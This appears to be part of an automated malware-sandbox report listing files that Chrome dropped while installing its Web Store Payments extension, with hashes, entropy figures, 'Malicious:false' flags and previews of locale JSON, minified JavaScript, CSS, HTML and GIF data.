                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "app_name": {.. "message": "Platby Internetov.ho obchodu Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplik.cia moment.lne nie je dostupn..".. },.. "craw_connect_to_network": {.. "message": "Pripojte sa k sieti.".. },.. "iap_unavailable": {.. "message": "Platby v aplik.cii moment.lne nie s. k dispoz.cii.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prihl.ste sa do prehliada.a Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\sl\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):617
                                                                                                                                                                Entropy (8bit):4.5101656584816885
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJGcyvmbZGGGcyvmbZ+WYpU34OBOEtf+dgca1ZO8ZpU34GcQArERff03OyZnLh:1HE4cyY4TcyY8WYpNoWa1w8ZpQcQ6AfK
                                                                                                                                                                MD5:3943FA2A647AECEDFD685408B27139EE
                                                                                                                                                                SHA1:0129DD19D28373359530B3B477FE8A9279DABB7D
                                                                                                                                                                SHA-256:18AFF072EE0DF7C3495045435C752A805606E6D5D462EF2321C443F1773F4B3A
                                                                                                                                                                SHA-512:42E62B3855611FF2E1D39C11404CB1A09825EE4CA6A8ACB3FF538B4574388F549E3BD79137DD4DC128A8DC44DD270D7D878E4AAD20DA8250A5C25297B0DEC09D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "app_name": {.. "message": "Pla.ila v spletni trgovini Chrome".. },.. "craw_app_unavailable": {.. "message": "Aplikacija trenutno ni na voljo.".. },.. "craw_connect_to_network": {.. "message": "Pove.ite se z omre.jem.".. },.. "iap_unavailable": {.. "message": "Pla.ila v aplikacijah trenutno niso na voljo.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Prijavite se v Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\sr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):743
                                                                                                                                                                Entropy (8bit):4.913927107235852
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJssbdOGGssbdO+WYpU347xBP+dgcucO8ZpU34s1muP03OyZnLAOfTYzDYD:1HEKsb59sbTWYplx4Xud8Zpy1mNOGAOv
                                                                                                                                                                MD5:D485DF17F085B6A37125694F85646FD0
                                                                                                                                                                SHA1:24D51D8642CDC6EFD5D8D7A4430232D8CDE25108
                                                                                                                                                                SHA-256:7FFDE34C58E7C376C042DE64DEF6481DAE32BE8B70F0B18EDF536290CBE0C818
                                                                                                                                                                SHA-512:0DDECFD860E99290B6C3AAA04F510272AE081CF2D93ED5832D9D6378EC9D36177FFBE213471247FB94721EA34A83E7665669200047091D0FDE134E3D763217E7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "....... . Chrome ...-..........".. },.. "app_name": {.. "message": "....... . Chrome ...-..........".. },.. "craw_app_unavailable": {.. "message": ".......... .. ........ ...........".. },.. "craw_connect_to_network": {.. "message": "........ .. .......".. },.. "iap_unavailable": {.. "message": "....... . .......... .. ........ ...........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "......... .. . Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\sv\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):630
                                                                                                                                                                Entropy (8bit):4.52964089437422
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJJMkbGGJMkb+WYpU34OACwz+dgNPGFZO8ZpU34JgpXLSb03OyZnLAOfTYLdID:1HErMkaqMk6WYpTOcb8ZpDgdZOGAOf8Y
                                                                                                                                                                MD5:D372B8204EB743E16F45C7CBD3CAAF37
                                                                                                                                                                SHA1:C96C57219D292B01016B37DCF82E7C79AD0DD1E8
                                                                                                                                                                SHA-256:B8BA77E0089B0676545EC16D32468B727812B444F90B33A7A5B748E6C36C4388
                                                                                                                                                                SHA-512:33640529E0D5DCC5CA4BDB0615A2818E8D26C6FCB7B3474C08AC3EB67B9DB40E1F0A79954ED20728CD47A686D2533DCBC76ABCBDB917F8530C8DE8BBA687352E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Betalning via Chrome Web Store".. },.. "app_name": {.. "message": "Betalning via Chrome Web Store".. },.. "craw_app_unavailable": {.. "message": "Appen .r inte tillg.nglig f.r tillf.llet.".. },.. "craw_connect_to_network": {.. "message": "Anslut till ett n.tverk.".. },.. "iap_unavailable": {.. "message": "Betalning i appen .r inte tillg.ngligt f.r n.rvarande.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Logga in i Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\th\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):945
                                                                                                                                                                Entropy (8bit):4.801079428724355
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:1HEKa1dDa1/WYp6UFi72SmlG8ZpyactrW2SAOGAOfvSLD:WK2DNYp6U4y3bpyLxwGFW
                                                                                                                                                                MD5:83E2D1E97791A4B2C5C69926EFB629C9
                                                                                                                                                                SHA1:429600425CB0F196DDD717F940E94DBD8BFF2837
                                                                                                                                                                SHA-256:2FECA577F43D97BAEEA464741D585892103585208FD0A935B810A03BDCE83C88
                                                                                                                                                                SHA-512:60A5928DAA8CB4341487F477C56B5A98B83EDE50E5F4F55A802E01FDDAB86F3E795D391953D3D9214552D14D3F58C5A183693C613720FC12FC387D7B8F9B9AB6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "............... Chrome .........".. },.. "app_name": {.. "message": "............... Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".............................".. },.. "craw_connect_to_network": {.. "message": ".........................".. },.. "iap_unavailable": {.. "message": "...............................................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "................. Chrome".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\tr\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):631
                                                                                                                                                                Entropy (8bit):4.710869622361971
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ9Y8GG9Y8+WYpU34wWT+dgGb0GO8ZpU34wryd7T03OyZnLAOfTYGbPKG:1HE0jWYpyRnG8Zpyr/OGAOfFPn
                                                                                                                                                                MD5:2CEAE0567B6BB1D240BBAD690A98CA3B
                                                                                                                                                                SHA1:5944346FBD4A0797B13223895995CAB58E9ECD23
                                                                                                                                                                SHA-256:A7CB86F30C9C31FE5540282C308BA96ADB4EC16EF98C87129EB88105E5BEF5FC
                                                                                                                                                                SHA-512:108A07C6D03D7178E8D0FFEF5349E0249A898D864964FED8757BD8A08BC1C6D9613F2A6C01AA34A6606127D1C6CE14C229FA02586677DBB060B85E3E845950E1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "app_name": {.. "message": "Chrome Web Ma.azas. .demeleri".. },.. "craw_app_unavailable": {.. "message": "Uygulama .u anda kullan.lam.yor.".. },.. "craw_connect_to_network": {.. "message": "L.tfen bir a.a ba.lan.n.".. },.. "iap_unavailable": {.. "message": "Uygulama ..i .demeler .u anda kullan.lamaz.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "L.tfen Chrome'da oturum a..n.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\uk\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):720
                                                                                                                                                                Entropy (8bit):4.977397623063544
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ7wILkSlXZGG7wILkSlXZ+WYpU34zb1Oy2P+dgSV1EjiTO8ZpU347qtfP2CTW:1HElwEkK4uwEkK8WYpd/dTV1e8Zptq5S
                                                                                                                                                                MD5:AB0B56120E6B38C42CC3612BE948EF50
                                                                                                                                                                SHA1:8B3F520E5713D9F116D68E71DAEED1F6E8D74629
                                                                                                                                                                SHA-256:68ABA284751EB9C856032062EF9B1651E2A1E5CE5FDA0977FFC97D63BA7BED9E
                                                                                                                                                                SHA-512:CD852A58217F739C1CD58567FF432D31A7AD3F68C884ABBA1DA95799BCD1545C6A5D3B06F319681C12B78AD0A709828DE4B22736316F148D21F5DB76A5BCCBEF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "....... ...-........ Chrome".. },.. "app_name": {.. "message": "....... ...-........ Chrome".. },.. "craw_app_unavailable": {.. "message": "........ ......... ...........".. },.. "craw_connect_to_network": {.. "message": "............. .. .......".. },.. "iap_unavailable": {.. "message": "....... ..... ........ ..... .. .........".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "........ . Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\vi\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):695
                                                                                                                                                                Entropy (8bit):4.855375139026009
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJMAZrSFZGGMAZrSFZ+WYpU34WFHoz+dgdklzoO8ZpU34NFHoz03OyZnLAOfTU:1HEI4B8WYpAKytFZ8ZpXKMOGAOfd6D
                                                                                                                                                                MD5:7EBB677FEAD8557D3676505225A7249A
                                                                                                                                                                SHA1:F161B4B6001AEAEAB246FF8987F4D992B48D47BE
                                                                                                                                                                SHA-256:051F96ED874C11C4A13589B5F68964E4F5B03B52DDA223D56524F2CA23760C04
                                                                                                                                                                SHA-512:74FD267CF7E299FB8E7054605C3F651F057F676FF865082FA24F4916755456768DB0DA62DBC515D829B48AB1F9CFC8AD3E841DCBF1F194D5CB14C5335A192A0D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "app_name": {.. "message": "Thanh to.n tr.n c.a h.ng Chrome tr.c tuy.n".. },.. "craw_app_unavailable": {.. "message": ".ng d.ng hi.n kh.ng kh. d.ng.".. },.. "craw_connect_to_network": {.. "message": "Vui l.ng k.t n.i v.i m.ng.".. },.. "iap_unavailable": {.. "message": "Thanh to.n trong .ng d.ng hi.n kh.ng kh. d.ng.".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "Vui l.ng ..ng nh.p v.o Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\zh_CN\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):595
                                                                                                                                                                Entropy (8bit):5.210259193489374
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ01GG01+WYpU34zeHz+dgfO8ZpU34YKiO03OyZnLAOfTYB6U:1HEpIWYpISv8Zp+JOGAOfa6U
                                                                                                                                                                MD5:BB73BF561BB79F89D9BF7C67C5AE5C65
                                                                                                                                                                SHA1:2FADD3A1959B29C44830033A35C637D0311A8C9C
                                                                                                                                                                SHA-256:D804F2A040D21D7511EFD5213D8E1721D64964A1A0DBB48E21622CEEDC9D967E
                                                                                                                                                                SHA-512:627D44CEF1FE5C5ABD598BD47FF5E22B9EFC1CF98DDE3868FA9E5896C134A0C9C055AC34EDDADAE56B6690E51AEA89965D38F770552A85C732CC796795DC68D2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome .........".. },.. "app_name": {.. "message": "Chrome .........".. },.. "craw_app_unavailable": {.. "message": ".........".. },.. "craw_connect_to_network": {.. "message": ".......".. },.. "iap_unavailable": {.. "message": "............".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_locales\zh_TW\messages.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:UTF-8 Unicode text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):634
                                                                                                                                                                Entropy (8bit):5.386215984611281
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:1HEJ2j62GG2j62+WYpU34m7T+dgc8nOO8ZpU34mvIO03OyZnLAOfTYAuH:1HEuSZCWYpsStwP8ZpROGAOfCH
                                                                                                                                                                MD5:5FF50C673CC0C661D615F0CFD0E6DCA0
                                                                                                                                                                SHA1:60DFF98DEAB9C4746B288BDD9C94B3BCAE5EAA85
                                                                                                                                                                SHA-256:C6F8C640F3353A7B9B1432A0C139C1AEEC40133800E6C9B467B63991AD660308
                                                                                                                                                                SHA-512:361D62D91F4931C5F34092C9F2C6A5323D5EEB82A24E7ABE11F7817D8D66341C0ECAD4DCB4B10873920C8D6A3CC9F5704889E178EB2549001A9F62BEDF6C8019
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {.. "app_description": {.. "message": "Chrome ............".. },.. "app_name": {.. "message": "Chrome ............".. },.. "craw_app_unavailable": {.. "message": ".............".. },.. "craw_connect_to_network": {.. "message": "......".. },.. "iap_unavailable": {.. "message": "................".. },.. "jwt_retrieve_failed": {.. "message": "The transaction could not be completed.".. },.. "please_sign_in": {.. "message": "... Chrome.".. }..}..
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\_metadata\verified_contents.json
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):7780
                                                                                                                                                                Entropy (8bit):5.791315351651491
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:192:RktDNJ2UzsL5KcASyoH+CouKP/iNGRo/oRHMIT:AZQflcsU
                                                                                                                                                                MD5:0834821960CB5C6E9D477AEF649CB2E4
                                                                                                                                                                SHA1:7D25F027D7CEE9E94E9CBDEE1F9220C8D20A1588
                                                                                                                                                                SHA-256:52A24FA2FB3BCB18D9D8571AE385C4A830FF98CE4C18384D40A84EA7F6BA7F69
                                                                                                                                                                SHA-512:9AEAFC3ECE295678242D81D71804E370900A6D4C6A618C5A81CACD869B84346FEAC92189E01718A7BB5C8226E9BE88B063D2ECE7CB0C84F17BB1AF3C5B1A3FC4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: [{"description":"treehash per file","signed_content":{"payload":"eyJjb250ZW50X2hhc2hlcyI6W3siYmxvY2tfc2l6ZSI6NDA5NiwiZGlnZXN0Ijoic2hhMjU2IiwiZmlsZXMiOlt7InBhdGgiOiJfbG9jYWxlcy9iZy9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiZHUtdGRPdUNWcmxDY254Q0poRkg2NXpLU05vb1RiUE56bDNHbzdRMGJ3SSJ9LHsicGF0aCI6Il9sb2NhbGVzL2NhL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJ6ZGtWaF9XdkxJWlhkck5xWHBvSHNRMGh1ZGtSM2d1QlMzb2VsTEZLNklVIn0seyJwYXRoIjoiX2xvY2FsZXMvY3MvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6Ik9nUkNIZlVoam9xOU93NHFfaEhvTTQxNzNMelJyYkVpUVdsRXNRSzhscFkifSx7InBhdGgiOiJfbG9jYWxlcy9kYS9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoiN2JVWW1LYkhQUUNRMXBGcmUzTHJySEhwWk9xN1c2Zk5hT0laWmdKUERTTSJ9LHsicGF0aCI6Il9sb2NhbGVzL2RlL21lc3NhZ2VzLmpzb24iLCJyb290X2hhc2giOiJOV3FkU3Rfc1NFMm9KT2VuSUZtM0pMRm9iOGtBZ3ZTa3RtZGpCRGJWazdBIn0seyJwYXRoIjoiX2xvY2FsZXMvZWwvbWVzc2FnZXMuanNvbiIsInJvb3RfaGFzaCI6ImgyaEZ0YUJoLXJQUEtoUm00QkFWM0VEZmhFbnh5MElGOVhYT3Z0aHhlNjAifSx7InBhdGgiOiJfbG9jYWxlcy9lbi9tZXNzYWdlcy5qc29uIiwicm9vdF9oYXNoIjoid0pSZDFmM3NxMERFVTJHLXd
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\craw_background.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):544643
                                                                                                                                                                Entropy (8bit):5.385396177420207
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:abyfBNC2FRdjiRXqbe5Dq31IVlMqX+wd5/CcMMJcRULt0NjyTOEzZQ+h72W3GB0n:Ft/g
                                                                                                                                                                MD5:6EEBED29E6A6301E92A9B8B347807F5F
                                                                                                                                                                SHA1:65DFB69B650560551110B33DCBA50B25E5B876DE
                                                                                                                                                                SHA-256:04CD9494B0ED83924DAD12202630B20D053D9E2819C8E826A386C814CC0A1697
                                                                                                                                                                SHA-512:FEDE6DB31F2AD242E7BC7B52A8859BA7F466A0B920A8DADCB32DCFB5B2A2742E98B767FF22E0C5BC5C11FEC021240AA9E458486C9039EB4EBE5CF6AF7BE97BF2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: /*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var d,e=e||{};e.scope={};e.arrayIteratorImpl=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};e.arrayIterator=function(a){return{next:e.arrayIteratorImpl(a)}};e.ASSUME_ES5=!1;e.ASSUME_NO_NATIVE_MAP=!1;e.ASSUME_NO_NATIVE_SET=!1;e.SIMPLE_FROUND_POLYFILL=!1;e.ISOLATE_POLYFILLS=!1;e.FORCE_POLYFILL_PROMISE=!1;e.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.e.defineProperty=e.ASSUME_ES5||"function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};e.getGlobal=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");};e.global=e.getGlobal(this);.e.IS_SYMBOL_NATIVE="func
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\craw_window.js
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with very long lines
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):261316
                                                                                                                                                                Entropy (8bit):5.444466092380538
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3072:I5vU7I6s2M9duIWFCbmYJ4tnFWdqpMad2vywhIp81QFv9F9nNsZgiDdOFlV/mZmc:I5vqFCb2p8Gx9FNNsZ9Dd/ceR
                                                                                                                                                                MD5:1709B6F00A136241185161AA3DF46A06
                                                                                                                                                                SHA1:33DA7D262FFED1A5C2D85B7390E9DBC830CBE494
                                                                                                                                                                SHA-256:5721A4B3F8E09C869A629EFFD350B51C9D46F0AC136717D4DB6265C0EE6F9AC8
                                                                                                                                                                SHA-512:26835B4C050F53AD2DDB84469DF9A84BBB2786A655AB52DFC20B54BEDCB81D1ECD789198D5B7D8B940242E5CEAC818A177444D402397AE82C203438C4B1D19CB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: /*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var b,k=k||{};k.scope={};k.createTemplateTagFirstArg=function(a){return a.raw=a};k.createTemplateTagFirstArgWithRaw=function(a,c){a.raw=c;return a};k.arrayIteratorImpl=function(a){var c=0;return function(){return c<a.length?{done:!1,value:a[c++]}:{done:!0}}};k.arrayIterator=function(a){return{next:k.arrayIteratorImpl(a)}};k.makeIterator=function(a){var c="undefined"!=typeof Symbol&&Symbol.iterator&&a[Symbol.iterator];return c?c.call(a):k.arrayIterator(a)};.k.arrayFromIterator=function(a){for(var c,d=[];!(c=a.next()).done;)d.push(c.value);return d};k.arrayFromIterable=function(a){return a instanceof Array?a:k.arrayFromIterator(k.makeIterator(a))};k.ASSUME_ES5=!1;k.ASSUME_NO_NATIVE_MAP=!1;k.ASSUME_NO_NATIVE_SET=!1;k.SIMPLE_FROUND_POLYFILL=!1;k.ISOLATE_POLYFILLS=!1;k.FORCE_POLYFILL_PROMISE=!1;k.FORCE_POLYFILL_PROMISE_WHEN_NO_UNHANDLED_REJECTION=!1;.k.objectCreate=k.ASSUME_ES5||"function"==typeof Object.cre
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\css\craw_window.css
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1741
                                                                                                                                                                Entropy (8bit):4.912380256743454
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:LalZ74H+rMwJHwIodHRmxt3jiu1iu1RDpfeWlMl548wJHwDwCapt/VMYXj8Eq27K:Z+rMm71le88S1tWYXmrVZFH
                                                                                                                                                                MD5:67BF9AABE17541852F9DDFF8245096CD
                                                                                                                                                                SHA1:A4AC74DD258E8E0689034FAA1B15A5C7C56DC3BB
                                                                                                                                                                SHA-256:10DFBD2D98950B79EE12F6B8E3885AABE31543048DE56AD4FC0A5E34D0D9D4EC
                                                                                                                                                                SHA-512:298FA132C6F122798FDB9BC6DE8024915147ADC20355B56A92F0ED9ACCE4549BE6E7F42212E07DCA166E31624D4E66E299565845D4BA1C51CA935050641B61FE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: html, body {. margin: 0;. overflow: hidden;.}..webview {. width: 100%;. height: 100%;. min-height: 100%;. position: absolute;.}...craw_overlay {. position: absolute;.. left: 0;. top: 0;. right: 0;. bottom: 0;.. background-color: white;.. -webkit-transition: opacity 250ms linear;.. display: -webkit-flex;. -webkit-flex-direction: column;. -webkit-flex: 1 0%;. -webkit-align-items: center;. -webkit-justify-content: center;.. -webkit-app-region: drag;.}...craw_overlay img {. margin: 16px;.}..#loading_overlay {. opacity: 1;.}..#offline_overlay {. opacity: 0;. display: none;.}..#offline_overlay > img {. -webkit-filter: saturate(0%);.}..#offline_overlay > span {. font-family: 'Open Sans', 'Deja Vu Sans', Arial, sans-serif;. font-size: 15px;. line-height: 21px;. color: #8d8d8d;. display: block;.}..#loading_splash {. width: 128px;. height: 128px;.}..#drag_overlay {. position: absolute;. left: 0;. top: 0;. right: 0;. bottom: 0;. pointer-events: none;. -webkit
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\html\craw_window.html
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:HTML document, ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):810
                                                                                                                                                                Entropy (8bit):4.723481385335562
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:hYenuEJIig5fRpvV4AEdN2sAAuzg/7RwQuLYpUH9KfRnQBGgZKy3QGgjPSWZDQL:hYeLJKTVNEuLAuzg/twQucpS9bj3
                                                                                                                                                                MD5:34A839BC40DEBC746BBD181D9EF9310C
                                                                                                                                                                SHA1:8B4EAA74D31EED5B0BABA3CA5460201F6B10DA46
                                                                                                                                                                SHA-256:BB8742615E4CD996AE5D0200E443AE6A6F0B473255F03AFFDB8FB4660DE4554D
                                                                                                                                                                SHA-512:EE81E5509CBC2CB2B6C834224688C1E1B1AA9AA3866C52F8EAED040D5C390653C52D8D681E2E2CF62906643962ABAC823D5B622385B983B21E0DCCAFDF281EFF
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: <!DOCTYPE html>.<html>. <head>. <link href="/css/craw_window.css" rel="stylesheet">. <script src="/craw_window.js"></script>. </head>. <body>. <webview></webview>. <div class="craw_overlay" id="loading_overlay">. <img src="/images/icon_128.png" />. <img src="/images/flapper.gif" />. </div>. <div class="craw_overlay" id="offline_overlay">. <img src="/images/icon_128.png" />. <span id="app_unavailable"></span>. <span id="connect_to_network"></span>. </div>. <div id="drag_overlay"></div>. <div id="top_bar">. <div id='close_button'>. <img src='/images/topbar_floating_button_close.png'/>. </div>. <div id='maximize_button'>. <img src='/images/topbar_floating_button_maximize.png'/>. </div>. </div>. </body>.</html>.
                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir6020_808020679\CRX_INSTALL\images\flapper.gif
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:GIF image data, version 89a, 30 x 30
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):70364
                                                                                                                                                                Entropy (8bit):7.119902236613185
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:768:g5TXOSBAqNIPmA8NcjCWdM0VFMJEwavTeElfWupav5TXg7wV+irIPny9MTVQHydi:g5KSmiIPmAhZWiMsDfWug7DmqM6HybkF
                                                                                                                                                                MD5:398ABB308EEBC355DA70BCE907B22E29
                                                                                                                                                                SHA1:CFFB77B8A1724B8F81D98C6D6AD0071D10162252
                                                                                                                                                                SHA-256:2B73533F47A99FFEA9CC405FFAFA9C4C53623F62487AEBFBA415945120B22040
                                                                                                                                                                SHA-512:FC7A56FC8A61A582161874B54ADBAD30A84840190008EDB0B6FBF84F91393CA58E988E3FE446F11A0C3C691C18249B93AEC2904B3D0C4F0857D79034F662385A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: GIF89a.......................................................!.......!..NETSCAPE2.0.....,.............9.:.h0.bT(6.!l.&..("g*k..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,.............9.:.h0.bT(6.!l.&..("g*k..JL1.[....o. .(:..B(.6."...Z.CUyh0.....j.C.z8..S....2.T'...Q..4 g|]$ueW.NyQ.IoL!AoF#9h>7.0t..%..,.@.m4..7..!.......,............................................................................................................'..w=.....\.)._6.k..OF...n.#\~"....2b3..I.)..eu.Q.`.e......gr.?>.s.I0.....@.~.Tr.[8.+.,.;..EE....S.*f.....,.....B8/D..;.9.q......ukC...r.I.....j......BGY...o2J....+O4....X4.....cH%7....I.....0H!.!.....!.,.............................................................................................................................................................................................................p8.a$....hh@.4....X,A.0L..(....JX.j...,..........z.X.Q....jB.d....B..
